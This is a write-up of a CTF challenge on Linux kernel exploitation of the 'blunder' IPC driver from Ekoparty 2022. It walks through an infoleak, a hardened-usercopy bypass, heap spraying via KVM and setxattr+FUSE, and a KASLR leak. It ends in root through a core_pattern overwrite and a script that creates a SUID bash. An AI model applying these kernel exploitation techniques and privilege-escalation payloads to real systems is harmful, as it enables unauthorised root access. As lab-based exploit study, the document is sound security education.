---
title:  "BFS Ekoparty 2022 Kernel exploitation challenge write-up"
categories: [Write-ups]
---

Last month Blue Frost Security [published two exploitation challenges](https://labs.bluefrostsecurity.de/blog.html/2022/10/25/bfs-ekoparty-2022-exploitation-challenges/) for Ekoparty 2022. One of them was a Linux kernel challenge. I don't have much experience with Linux kernel exploitation, so this was a good opportunity to practise. I also write this up as a reference for my future self.

Let's start!

## Setup
We are given the source code of a Linux Kernel Module. We are told it's an IPC driver, and we are asked to load it on an Ubuntu 22.04 VM with latest kernel (5.15.0-52-generic) and get root by exploiting it.

For the virtual machine, I will be using Vagrant with VirtualBox. In order to create a virtual machine, first we need to setup a Vagrantfile. This can be done with `vagrant init ubuntu/focal64`. Then, we can edit it and add the line `config.vm.synced_folder ".", "/vagrant"` to mount the host current directory on `/vagrant` in the guest. Finally, we can create the VM with `vagrant up`, connect to it with `vagrant ssh`, and shut it down with `vagrant halt`. Once we are connected, we can build the module with `make`, load it with `sudo insmod blunder.ko`, and give access permissions to the file with `sudo chmod 666 /dev/blunder`. This gives us a fast iteration cycle of building the exploiting, testing it, and resetting the VM in case it crashes (which in my case happened a lot).

## Analysis
### The driver
The driver implements an IPC mecanism for sending messages from one process to another. The idea is that each process opens the file `/dev/blunder`, creates a buffer with `mmap`, and then one sends a message with the ioctl `IOCTL_BLUNDER_SEND_MSG` while the other receives it with `IOCTL_BLUNDER_RECV_MSG`. 

The interesting thing is that the mmap handler calls `kmalloc` and maps the result to the virtual memory area, so it is backed up by kernel heap and is accessible from both kernel and userspace. The driver uses that mapping to store the metadata of buffers and the contents of the messages received, so when a message is sent to a process it is directly copied to its mapping. Then, when the process attempts to receive it, the kernel simply returns a pointer to that mapping where the message has been already copied. Having that mapping shared by both kernel and user allows to avoid an extra copy of the message, since it is directly copied from one process to another.

Finally, in addition to data, messages can also include file descriptors which will be copied from one process to another.

Later on I was told this driver was inspired by [Binder](https://elinux.org/Android_Binder), an Android driver which implements a similar IPC mechanism.

### Structures
The global state of the driver keeps the processes that are using the device in a rb-tree ordered by pid, and a pointer to one of them as a context manager, which doesn't seem to have much special functionality.
```cpp
struct blunder_device {
	spinlock_t lock;
	struct rb_root procs;
	struct blunder_proc *context_manager;
};
```
{: file="blunder.h" }

Each process has an associated `blunder_proc`, which has a `blunder_alloc` and a list of messages pending to receive.
```cpp
struct blunder_proc {
	struct kref refcount;
	spinlock_t lock;
	int pid;
	int dead;
	struct rb_node rb_node;
	struct blunder_alloc alloc;
	struct list_head messages;
};
```
{: file="blunder.h" }

The `blunder_alloc` structure holds a kernel pointer to the mapping (the one returned by `kmalloc`), its size, the difference between the kernel and user pointers (so `user_ptr = mapping - user_buffer_offset`), and a list of buffers where messages are saved.
```cpp
struct blunder_alloc {
	spinlock_t lock;
	void *mapping;
	size_t mapping_size;
	ptrdiff_t user_buffer_offset;
	struct list_head buffers;
};
```
{: file="blunder.h" }

Buffers are described by `blunder_buffer`. Every buffer is stored in the mapping that is shared by both kernel and user, and the metadata includes whether it's free or not, its size, and the size of its data in case it's not free. `offsets_size` is an unimplemented feature and remains 0. This structure is followed by the actual data.
```cpp
struct blunder_buffer {
	struct list_head buffers_node;
	atomic_t free;
	size_t buffer_size;
	size_t data_size;
	size_t offsets_size;
	unsigned char data[0];
};
```
{: file="blunder.h" }
Buffers are held in a linked list. First, when the user performs the mapping, the whole area is set a single buffer. Then, each time a message is stored in a buffer and the remaining size is large enough, the buffer is splitted and the remaining space is used to create a new buffer that is added to the linked list.



Finally, messages are described by `bundler_message`. It has a pointer to the sender (although actually it's the pid that it's stored there), a pointer to the buffer where the data is stored, and an array of `struct file*`s that must be installed on the receiving end.
```cpp
struct blunder_message {
	struct list_head entry;
	int opcode;
	struct blunder_proc *from;
	struct blunder_buffer *buffer;
	size_t num_files;
	struct file **files;
};
```
{: file="blunder.h" }

On the user side, the user must hand the following data to send a message, with the offsets stuff being unimplemented.
```cpp
struct blunder_user_message {
	int handle;
	int opcode;
	void *data;
	size_t data_size;
	size_t *offsets;
	size_t offsets_size;
	int *fds;
	size_t num_fds;
};
```
{: file="blunder.h" }

## Vulnerabilities
As you may have noticed with the analysis above, there is one serious issue with the design. The mapping, which is shared by user and kernel, contains `blunder_buffer`s that have kernel pointers and other metadata. This supposes an infoleak. Unfortunately, the driver doesn't allow us to map as writable:
```c++
/* Bail out if mapping is too large or writable */
if (sz > BLUNDER_MAX_MAP_SIZE || vma->vm_flags & VM_WRITE) {
    goto out;
}
```
{: file="blunder.c in blunder_mmap" }
However, the `mmap` handler doesn't remove the `VM_MAYWRITE` flag from `vma->vm_flags`, which is set by default if you open the device file with write permissions. This means we can map as read-only, and then change it to writable with `mprotect`, allowing us to modify the `blunder_buffer`s. 

In fact, BFS published a [hint](https://twitter.com/bluefrostsec/status/1586740929041506305) that pointed to these vulnerabilities. It looks like Binder had the same design issue of storing the metadata in the shared mapping, although they were clever enough to clear the `VM_MAYWRITE` flag.

So what have we got? Recall we have full control of `blunder_buffer` structs, because they are mapped in userspace. Regarding leaks, `blunder_buffer`s are linked together with the usual `list_head`. If we have two of them, the `next` pointer of the first one will point to the second one, leaking the kernel address of the mapping. Assuming we are mapping one page, this belongs to `kmalloc-4k`. In addition, the `prev` pointer will point to the head of the list, which is stored in `blunder_proc`. Since its size is 104 bytes, it will be in `kmalloc-128`.

On the other hand, modifying the buffer metadata may give us some juicy primitives. For example, modifying its size may allow us to send a message bigger than the available size, resulting in a heap overflow with controlled data.

Let's write a simple POC. Code snippets won't include error handling for brevity. First, let's check if the leak works:
```cpp
int g_fd;
void* g_p;

void dump(const void* p, size_t size) {
	const uint64_t* p_u64 = (const uint64_t*)p;
	for (size_t i = 0; i < size/8; i++) {
		printf("%016lx ", p_u64[i]);
	}
	printf("\n");
}

int send_blunder_message(void* data, size_t data_size, int* fds, size_t num_fds) {
	// Send a message to ourselves
	struct blunder_user_message umsg = {
		.handle = getpid(),
		.data = data,
		.data_size = data_size,
		.fds = fds,
		.num_fds = num_fds,
	};
	return ioctl(g_fd, IOCTL_BLUNDER_SEND_MSG, &umsg);
}

int main() {
	g_fd = open("/dev/blunder", O_RDWR);
	g_p = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, g_fd, 0);

	char data[0x10];
	send_blunder_message(data, sizeof(data), NULL, 0);
	dump(g_p, 0x60);
}
```
{: file="poc.c" }

```console
vagrant@ubuntu-jammy:/vagrant$ ./poc
ffff9272c50fb040 ffff9272c3a5fd48 0000000000000000 0000000000000010 0000000000000010 0000000000000000
0000000000000000 0000000000000000 ffff9272c3a5fd48 ffff9272c50fb000 0000000000000001 0000000000000f90
```

When we send a message, the first blunder_buffer is splitted. Here we are leaking the linked list pointers of both buffers. The first pointer points to the second buffer, the last one points to the first one, and the two others point to the list head in `blunder_proc`. Now, let's try to modify the buffer and do an overflow. For example, we could set the first buffer at the beginning of the mapping as free, and change its size to 0x2000.

```cpp
[...]

mprotect(g_p, 0x1000, PROT_READ|PROT_WRITE);
struct blunder_buffer* buf = g_p;
buf->free = 1;
buf->buffer_size = 0x2000;

char* too_big_data = malloc(0x2000);
send_blunder_message(too_big_data, 0x2000, NULL, 0);
```
{: file="poc.c" }
```console
vagrant@ubuntu-jammy:/vagrant$ ./test
[...]
Segmentation fault
```

Hmm? Did I fail at coding C once more? Let's take a look at dmesg:

```console
vagrant@ubuntu-jammy:/vagrant$ sudo dmesg
[...]
[ 135.345109] usercopy: Kernel memory overwrite attempt detected to SLUB object
'kmalloc-4k' (offset 48, size 8192)!
[ 135.349562] ------------[ cut here ]------------
[ 135.351382] kernel BUG at mm/usercopy.c:99!
[ 135.353388] invalid opcode: 0000 [#2] SMP PTI
[ 135.355096] CPU: 0 PID: 1366 Comm: test Tainted: G      D    OE     5.15.0-53
[ 135.357718] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBo
[ 135.360335] RIP: 0010:usercopy_abort+0x7b/0x7d
[...]
[ 135.383391] Call Trace:
[ 135.384114]  <TASK>
[ 135.384785]  __check_heap_object+0x174/0x1b0
[ 135.385673]  __check_object_size.part.0+0x134/0x150
[ 135.386618]  __check_object_size+0x1d/0x30
[ 135.387477]  blunder_ioctl+0x238/0x3e0 [blunder]
```

It looks like modern kernels have a mitigation called [hardened usercopy](https://lwn.net/Articles/695991/), which checks that "what is being copied fits within the size of the object allocated" when calling `copy_to_user` and `copy_from_user`. Since we are attempting to write 8192 bytes to a kmalloc-4k object, the check fails. This effectively kills heap overflow from one object to another. Isn't there anything we can do?

Turns out, there is. We can bypass this mitigation if we write directly to the object next to ours, meaning the `dest` argument of `copy_from_user` must point to the target object. We can get this by creating a fake `blunder_buffer` exactly at the end of our mapping, so its data starts at the beginning of the next object. Then, we can link it to our list of buffers by modifying the first `blunder_buffer` in the mapping. In order to do so, we'll need to get its kernel address from the leak. Let's try it!

```cpp
[...]
// Get mapping address
struct blunder_buffer* buf = g_p;
uint64_t mapping_addr = (uint64_t)buf->buffers_node.next - 0x40;

// Create fake buffer
struct blunder_buffer* fake_buf = g_p + 0x1000 - sizeof(struct blunder_buffer);
fake_buf->free = 1;
fake_buf->buffer_size = 0x1000;

// Link it after our first buffer
buf->buffers_node.next = mapping_addr + 0x1000 - sizeof(struct blunder_buffer);

char* too_big_data = malloc(0x1000);
send_blunder_message_nocheck(too_big_data, 0x1000, NULL, 0);
```
{: file="poc.c" }

Running this crashes the vm, which means we are successfully overflowing into some object and bypassing the mitigation!


## Exploitation
### First primitives
Before looking for some target object to overwrite, let's consider the powerful spray primitive we have. When we `open` the device, a `blunder_proc` is allocated in kmalloc-128. Then, when we `mmap` a page for the device, it is allocated in kmalloc-4k. Because of the leaks discussed earlier, we are able to obtain the address of both objects. This leads to the following strategy:
1. Allocate a bunch of mappings in kmalloc-4k.
2. Get their kernel addresses and look for two of them that are adjacent.
3. Free the second one and reallocate it with a target object.
4. Trigger the overflow on the first one to overwrite the target object.

Since each process can only open and map the device once, this will require forking and some IPC mechanism.

Now, when looking for target objects I usually refer to [this post by ptr-yudai](https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628). Our heap overflow is in kmalloc-4k, and the only object listed there that would fit that size is `msg_msg`. I have been reading some posts about kernel exploiting abusing that object ([link](https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html), [link](https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html)), so I was excited to try that technique. However, I wasn't able to trigger the reallocation correctly. Then I realised that `msg_msg` is allocated with the flag `GFP_KERNEL_ACCOUNT` ([here](https://elixir.bootlin.com/linux/v5.15/source/ipc/msgutil.c#L53)), so it is stored in `kmalloc-cg-4k` instead of `kmalloc-4k`. I knew cross-cache overflows were a thing ([link](https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html)), but I didn't feel confident enough to try that out.

Then, I started to think about overwriting the `blunder_proc`. It belongs to kmalloc-128, but we know its address. Therefore, similarly to the previous strategy, we could:
1. Allocate two adjacent `blunder_proc`s.
2. Free the first one, do some heap spray and reallocate it with a fake `blunder_buffer` whose data will start at the beginning of the second `blunder_proc`.
3. Link that buffer to our linked list.
4. Send a message that will be stored in the fake `blunder_buffer` and will overwrite the second `blunder_proc`.

Note that we could also have freed the second `blunder_proc` and replaced it with some other target object. However, the only target object for kmalloc-128 that [the post](https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628) mentions is `subprocess_info`, which now belongs to kmalloc-96. So let's stick to `blunder_proc` for now.

What primitives do we get when overwriting `blunder_proc`? If we remember, it has a `blunder_alloc` embedded in it, which has a kernel pointer to the mapping. When the `blunder_proc` is freed, that mapping is also freed. Hence, if we overwrite that pointer, we can get an arbitrary free primitive. However, at the time I didn't think of any suitable target object, and didn't follow that path. More on this path [here](#another-exploit-strategy).

I was looking for some read primitive that would allow me to leak the kernel base. I found it with the `blunder_message` struct. `blunder_proc` has a list of messages that have been sent to the process and copied to its mapping, and that are pending to receive with `IOCTL_BLUNDER_RECV_MSG`. The idea is to link a fake `blunder_message` to that list. We can create the fake message in the shared mapping, and as we know its address, we'll be able to link it when overwriting the `blundre_proc`. Then, when receiving that message, the driver will do:
```cpp
    umsg.data_size = msg->buffer->data_size;
```
{: file="blunder.c in blunder_recv_msg" }
This dereferences the `buffer` pointer of the fake message and returns us its value. Therefore, creating a fake message with an appropiate `buffer` pointer we can have an arbitrary read primitive. The message is removed from the list when received. In order to repeat the primitive, we have to use `IOCTL_BLUNDER_FREE_BUF` with the fake `blunder_buffer` to mark it as free, and repeat the overflow to link the message again. Note that there is no more heap spray required: once we successfully reallocate with the fake `blunder_buffer`, we are done.

One issue I faced trying to implement this is the following. We need to spawn multiple processes in order to allocate serveral `blunder_proc`s, which are held in a rb-tree. When overwriting the target `blunder_proc`, I was corrupting its `rb_node` field. Then, when any of the other processes finished and the device was closed, the driver tried to erase the corresponding `blunder_proc` from the rb-tree, crashing the VM. To solve this, I had to dig a bit into rb-trees. Turns out each `rb_node` has a pointer to its left and right child, and a field `__rb_parent_color`, which holds both a pointer to the parent and the color of the node (the LSB bit is used for the color, and the rest for the pointer). The solution was to wait for every other process to finish, so our `blunder_proc` becomes the root of the rb-tree. Then, the state of its `rb_node` is simple and we can correctly set it when overwriting it: every pointer is NULL, and its color is black (according to [this](https://elixir.bootlin.com/linux/v5.15/source/lib/rbtree.c#L100)).

### Heap spray
Regarding the heap spray, I didn't know what to use in order to reallocate the first `blunder_proc` with a fake `blunder_buffer`. I wanted some object with controlled user data and live time which would fit in kmalloc-128. I had read about using `setxattr` with FUSE as a replacement for userfaultfd, but I wanted to do some research. Looking at [references to `memdup_user`](https://elixir.bootlin.com/linux/v5.15/A/ident/memdup_user) I found [this](https://elixir.bootlin.com/linux/v5.15/source/arch/x86/kvm/x86.c#L3913), which is triggered with the KVM ioctl `KVM_X86_SET_MSR_FILTER` and allows spraying objects with controlled data and live time of size up to 1536 bytes. It can be used as follows:

```cpp
#define N_VMS 100
#define SPRAY_SIZE 128

void display_slab_info(const char* msg) {
	printf("[%s]\n", msg);
	system("bash -c \"sudo cat /proc/slabinfo | grep '^kmalloc-128'\"");
}

int main() {
	// Setup VMs
	int vm_fds[N_VMS];
	int kvm_fd = open("/dev/kvm", O_RDWR);
	for (size_t i = 0; i < N_VMS; i++) {
		vm_fds[i] = ioctl_chk(kvm_fd, KVM_CREATE_VM, 0);
	}

	// Setup spray
	void* spray = malloc(SPRAY_SIZE);
	struct kvm_msr_filter filter = {
		.flags = KVM_MSR_FILTER_DEFAULT_DENY,
	};
	for (size_t i = 0; i < KVM_MSR_FILTER_MAX_RANGES; i++) {
		filter.ranges[i] = (struct kvm_msr_filter_range) {
			.flags = KVM_MSR_FILTER_READ,
			.nmsrs = SPRAY_SIZE*8,
			.base = 0,
			.bitmap = spray,
		};
	}

	// Trigger spray
	display_slab_info("before spray");
	for (size_t i = 0; i < N_VMS; i++)
		ioctl_chk(vm_fds[i], KVM_X86_SET_MSR_FILTER, &filter);
	display_slab_info("after spray");
	for (size_t i = 0; i < N_VMS; i++)
		close(vm_fds[i]);
	display_slab_info("after releasing");
}
```
{: file="spray_poc.c" }
```console
vagrant@ubuntu-jammy:/vagrant$ ./test
[before spray]
kmalloc-128         1440   1856    128   32    1 : tunables    0    0    0 : slabdata     58     58      0
[after spray]
kmalloc-128         2976   2976    128   32    1 : tunables    0    0    0 : slabdata     93     93      0
[after releasing]
kmalloc-128         1570   2048    128   32    1 : tunables    0    0    0 : slabdata     64     64      0
```
It has several problems though: it is only available for x86, it requires the user to belong to the `kvm` group, and in case of being inside a vm, it requires nested virtualisation to be enabled. As the last two conditions are not satisfied by the default ubuntu vm, I gave up on this and tried the `setxattr + FUSE` heap spray.

The idea is to call `setxattr(path, name, value, size, 0)`, where `value` is a pointer to our spray and `size` its size. The kernel will call `kmalloc(size)` and copy our spray to the result [here](https://elixir.bootlin.com/linux/v5.15/source/fs/xattr.c#L563). The problem is that it's freed at the end of the syscall ([here](https://elixir.bootlin.com/linux/v5.15/source/fs/xattr.c#L577)), so we want to block in order to delay this. Previously, userfaultfd could be used. It allowed you to handle page faults in userspace, so if we divided our spray payload in two pages and registered userfaultfd for the second, we could make `copy_from_user` block when trying to read from the second page, while the first part of the payload has already been copied ([link](https://duasynt.com/blog/linux-kernel-heap-spray)). However. userfaultfd isn't available anymore.

The solution is to use FUSE as substitute. FUSE (**F**ilesystem in **USE**rspace) allows you to define handlers for some filesystem syscalls such as `open`, `read`, `write`, etc, in userspace. You can read more about it [here](https://maastaar.net/fuse/linux/filesystem/c/2016/05/21/writing-a-simple-filesystem-using-fuse/). Most resources I've found ([link](https://github.com/nrb547/kernel-exploitation/blob/main/cve-2021-32606/cve-2021-32606.md#fuse-technique), [link](https://www.graplsecurity.com/post/iou-ring-exploiting-the-linux-kernel), [link](https://www.willsroot.io/2022/01/cve-2022-0185.html)) use this in a very similar way to userfaultfd. The idea is again to split our payload in two pages: an anoymous mapping, and a file mapping backed by our filesystem. Then, we can block in the `read()` handler of our filesystem when `copy_from_user` reaches the second page.

However, with FUSE you can also define a `setxattr` handler. So instead on blocking on the read operation on `copy_from_user()`, I thought it was easier to block directly in the `setxattr` handler, called from [here](https://elixir.bootlin.com/linux/v5.15/source/fs/xattr.c#L575). I think that's a bit simpler to implement, because you don't have to worry about having your payload divided in two pages. In this case, `path` (the file we call `setxattr` on) must belong to the filesystem. You can read the full implementation [here](https://github.com/klecko/exploits/blob/master/bfs-ekoparty-2022/spray.c). I have written it in a separate file so it's easier for me (and maybe others) to reuse.


### KASLR leak
Even when I got an arbitrary read primitive, I still struggled to get the kernel base. I didn't know any useful object I could leak from kmalloc-128 and kmalloc-4k. Fortunately, `blunder_message` has an array of `struct file*`s, which [has a pointer](https://elixir.bootlin.com/linux/v5.15/source/include/linux/fs.h#L972) to a `struct file_operations`, which [has function pointers](https://elixir.bootlin.com/linux/v5.15/source/include/linux/fs.h#L2073) that we can leak to get the kernel base.

The idea is to fork and let the child send a message to himself and tell the main process its `blunder_proc` address, so he can perform the leaks. We can't do this in the parent, because every time we do the arbitrary read primitive we overwrite its `blunder_proc` and the message with a `struct file*` would be lost. In the end, with chained reads we are leaking:
```cpp
child_blunder_proc->messages.next->files[0]->f_op->llseek
```
Which, when the `struct file` corresponds to `stdin`, points to the function `no_llseek`.

### Privilege escalation
Now that we have broken KASLR, how do we get to escalate privileges? Our write primitive is rather weak: we can link a fake `blunder_buffer` to write somewhere, but it must be valid, that is, have a size lower than `BLUNDER_MAX_MAP_SIZE = 0x20000`, greater than the amount of data we want to write, and have the field `free` set to 1. We need the first constraint because we need to specify the buffer size as our message size. Setting it to a lower value would result in the fake buffer being splitted, and crashing when dealing with the linked lists. Since we want to avoid overwriting more than needed due to a too big size, we can place the data at the end of a mapped page followed by an unmapped page. That way, the `copy_from_user` in `blunder_send_message` will fail after copying it to the fake `blunder_buffer`.

So I wrote some code that would check whether an address was suitable to use as a fake `blunder_buffer`, and started playing with some interesting objects I could overwrite:
```cpp
uint64_t payload_addr = X;
uint64_t target_buf_addr = payload_addr - sizeof(struct blunder_buffer);
uint64_t free_addr = target_buf_addr + offsetof(struct blunder_buffer, free);
uint64_t buffer_size_addr = target_buf_addr + offsetof(struct blunder_buffer, buffer_size);
uint64_t is_free = arb_read(free_addr) & 0xFFFFFFFF;
uint64_t buffer_size = arb_read(buffer_size_addr);
if (buffer_size < 16 || buffer_size > BLUNDER_MAX_MAP_SIZE)
    die("error: buffer_size = %#lx, needed >= 0x10 and <= %#x :(\n", buffer_size, BLUNDER_MAX_MAP_SIZE);
if (is_free == 0)
    die("error: free = 0, needed nonzero :(\n");
printf("blunder_buffer suitable: free=%lx, buffer_size=%lx\n", is_free, buffer_size);
```
{: file="exploit.c" }

#### Creds
With a KASLR leak and an arbitrary read primitive, I could calculate the address of `init_task`, traverse the linked list of tasks until finding mine, and read its `cred` pointer. I managed to find a suitable place to use as fake buffer, where the buffer size corresponded to the `uid` of a previous `struct cred`. That's when hardened usercopy hit me in the face again:

```
[ 5885.570967] usercopy: Kernel memory overwrite attempt detected to SLUB object 'cred_jar' (offset 56, size 1000)!
[ 5885.573638] ------------[ cut here ]------------
[ 5885.573641] kernel BUG at mm/usercopy.c:99!
[...]
```
{: file="pain.txt" }
The `copy_from_user` was pointing to the previous `struct cred` in memory, so it was caught by the mitigation. So close yet so far.

#### modprobe_path
I was surprised when I saw that `CONFIG_STATIC_USERMODEHELPER` is not set by default on Ubuntu. The idea was to modify `modprobe_path`. So I tried to check if some data nearby could be used a fake `blunder_buffer`. But it wasn't the case. I found a suitable place, but it was a bit far away from our target `modprobe_path`. In theory this isn't a problem: because we have an arbitrary read primitive, we can just read everything we're going to overwrite so we don't actually modify anything except our target. But the vm was crashing anyways. The reason was probably that when sending a message, appart from storing the data in the buffer, the driver does `buf->free = 0` and `buf->data_size = umsg.data_size`. In our case, this probably overwrote some used pointers or stuff, which lead to a crash. Unlucky!

#### core_pattern
I was about to consider other options, like the arbitrary free primitive we saw, or cross-cache attacks, when I remembered there was also `core_pattern`. While the `modprobe_path` binary is executed when we attempt to execute a file with unknown format, `core_pattern` is used to execute a binary when a process crashes, with the intention of producing a core file. This time, I found a suitable address to use as a fake `blunder_buffer` very close, and it didn't seem to overwrite anything important. So we can overwrite `core_pattern` with `|/tmp/x`, which is a script that will copy `bash`, make root its owner, and activate the SUID bit. Then, we only have to crash a process for the script to be executed and get a root shell:
```cpp
system("echo '"
           "#!/bin/bash\n"
           "cp /usr/bin/bash /tmp/bash\n"
           "chown root:root /tmp/bash\n"
           "chmod 4755 /tmp/bash"
       "' > /tmp/x");
system("chmod +x /tmp/x");
if (!fork()) {
	*(uint64_t*)0 = 0;
}
wait(NULL);
system("/tmp/bash -p");
```
{: file="exploit.c" }
Note that in my exploit I had forked previously and I was running on a child process, so running `/tmp/bash` had to be done from the parent process to keep stdin working.

### Full exploit
You can read the full exploit [here](https://github.com/klecko/exploits/tree/master/bfs-ekoparty-2022).

## Another exploit strategy
Instead of going down the way of the arbitrary read primitive, we could have used the arbitrary free. I was told this was the path the author followed.

Given the ability to overwrite a `blunder_proc` as we did [here](#first-primitives), we can overwrite the `mapping` pointer, which points to the memory region returned by kmalloc and mapped to the user, with a maximum size of 0x20000. The idea is to make it point to the mapping of another target process. Then, when closing the process with the overwritten `blunder_proc`, the mapping of the target process will be freed instead. But that target process will still have a stale pointer to its mapping in its `blunder_proc`, leading to UAF. Not only that, but that mapping is still mapped in userspace. So we have up to 0x20000 bytes of kernel heap mapped in userspace.

One of the ways of exploiting this could be opening `/etc/passwd` many times to spray `struct file` objects. Then, we could iterate our mapping, which belongs to kernel heap, looking for one of the files, and add `FMODE_WRITE` and `FMODE_CAN_WRITE` to its `file->f_mode` to get [write permissions](https://elixir.bootlin.com/linux/v5.15/source/fs/read_write.c#L578). This is probably the easiest way to get a root shell, but we could spray other known objects to gain other primitives.

What's cool about this exploit strategy is that it doesn't require to break KASLR, so there are no hardcoded offsets that change from kernel to kernel, except maybe the offset of the field `f_mode` inside `struct file`, which I believe is unlikely to change much and can be figured out. The exact same exploit would work for every Linux system with the vulnerable driver. On the contrary, my exploit needs the offsets of two symbols to be adjusted: `core_pattern` and `no_llseek`. And they do change between versions.


## Unintended bugs
I was told there are two unintended bugs that I missed. Let's take a look at them.
### Missing locking
In `blunder_alloc_get_buf` we are not taking the lock `alloc->lock`, which could lead to race conditions.
```cpp
struct blunder_buffer *blunder_alloc_get_buf(struct blunder_alloc *alloc,
                                             size_t size)
{
    struct blunder_buffer *buf = NULL;
    struct blunder_buffer *new_buf = NULL;
    list_for_each_entry(buf, &alloc->buffers, buffers_node) {
        if (atomic_read(&buf->free) && buf->buffer_size >= size) { // [1]
            // Is there enough space to split? Then do it!
            uint64_t remaining = buf->buffer_size - size;
            if (remaining > MIN_BUF_SIZE) {
                // Make new buf at the end of this buf
                new_buf = (struct blunder_buffer *)((void *)&buf->data[size]);
                // New buffer size is remaining - header
                new_buf->buffer_size = remaining - sizeof(*new_buf);
                // Adjust old buffer size to size
                buf->buffer_size = size;
                // Mark as free
                atomic_set(&new_buf->free, 1);
                // Add to list after our current entry
                list_add(&new_buf->buffers_node, &buf->buffers_node); // [2]
            }

            // Mark buf as non-free and return it
            atomic_set(&buf->free, 0); // [3]
            return buf;
        }
    }

    // If we got here we're out of mem!
    return NULL;
}
```
{: file="blunder.c" }

Then, in `blunder_send_msg`:
```cpp
[...]
buf = blunder_alloc_get_buf(&target->alloc, umsg.data_size + umsg.offsets_size);
if(!buf) {
	ret = -ENOMEM;
	goto release_msg;
}
buf->data_size = umsg.data_size;

[...]

if (copy_from_user(buf->data, umsg.data, umsg.data_size)) { // [4]
	ret = -EFAULT;
	goto release_buf;
}
[...]
```
{: file="blunder.c" }

For example, this can lead to a single buffer being associated to two different messages sent by two different threads if both threads get to [1] but none of them has marked the buffer as not free in [3] yet. If one of the messages splits the buffer, a new buffer will be created and linked in [2]. If the other message doesn't split the buffer, its data could overwrite the metadata of `new_buf` when it is copied in [4].

### UAF
When sending a message with file descriptors, in `blunder_import_fds` the driver calls `fget` on each of them and stores the resulting `struct file*` in the `blunder_message`:

```cpp
static int blunder_import_fds(struct blunder_message *msg, int * __user ufds, int num_fds) {
	[...]
	for(i=0; i < num_fds; i++) {
		msg->files[i] = fget(fds[i]); // [1]
		if (!msg->files[i]) {
			break;
		}
	}
	msg->num_files = i;
	return 0;
}
```
{: file="blunder.c" }

Then, when receiving the message in `blunder_recv_msg`:

```cpp
static int blunder_recv_msg(struct blunder_proc *proc, struct blunder_user_message * __user arg) {
	[...]
	for (curr_fd=0; curr_fd < msg->num_files; curr_fd++) {
		fds[curr_fd] = get_unused_fd_flags(O_CLOEXEC); // [2]
		if (fds[curr_fd] < 0) {
			/* Can't make a new fd, return error */
			ret = -ENOSPC;
			goto out_release;
		}
		fd_install(fds[curr_fd], msg->files[curr_fd]);
	}

	[...]
	out_release:
	/* Close the fds we have installed so far */
	if (curr_fd) {
		while(--curr_fd) {
			close_fd(fds[curr_fd]); // [3]
		}
	}

	/* Free the message and buffer */
	blunder_release_msg(proc, msg);
	return ret;
}
```
{: file="blunder.c" }
```cpp
static void blunder_release_msg(struct blunder_proc *proc, struct blunder_message *msg) {
    int f;
    spin_lock(&proc->lock);
    if (msg->files && msg->num_files) {
        /* Files not transfered to userspace must be released. */
        for (f = 0; f < msg->num_files ; f++) {
            fput(msg->files[f]); // [4]
        }
        kfree(msg->files);
    }
    spin_unlock(&proc->lock);
    kfree(msg);
}
```
{: file="blunder.c" }

Let's say two file descriptors are being sent. In [1], we call `fget()` on each of them, taking a reference. Then, when being received, let's say the first call to `get_unused_fd_flags()` in [2] succeeds while the second fails. For the first file, it calls `fd_install(fd, file)`, which basically performs `current->files->fdt->fd[fd] = file`, i.e., it installs the given `file` on the file descriptor table of the current process. As its [docs](https://elixir.bootlin.com/linux/v5.15/source/fs/file.c#L569) says: "callers should treat it as if they had called `fput(file)`", because `fd_install` doesn't increase the refcount of the file. Then, when the call to `get_unused_fd_flags()` fails for the second file, we jump to `out_release`. There, we call `close_fd(fd)` in [3], which basically sets `current->files->fdt->fdt->fd[fd] = NULL` and calls `fput(file)` on the file that was previously there, dropping a reference. Finally, in [4] we call `fput(file)` on both files.

In the end, for the second file we have taken a reference in [1] and dropped it in [4], but for the first one we have taken a reference in [1] and dropped it in [3] and [4]. The problem is that we are calling `fput()` on a file that was previously passed to `fd_install`, despite the docs of `fd_install` saying that it consumes the refcount of the file.

The primitive described above allows us to decrease by one the reference counter of a file. If we open a file and apply this primitive, the associated `struct file` will be freed, and we'll have a dangling pointer in our file descriptor tables, leading to UAF.

## Conclusion
I hope you enjoyed and learnt as much as I did, and thanks Blue Frost Security for the challenge. Please don't hesitate to contact me if you see something wrong, or for any question or clarification.

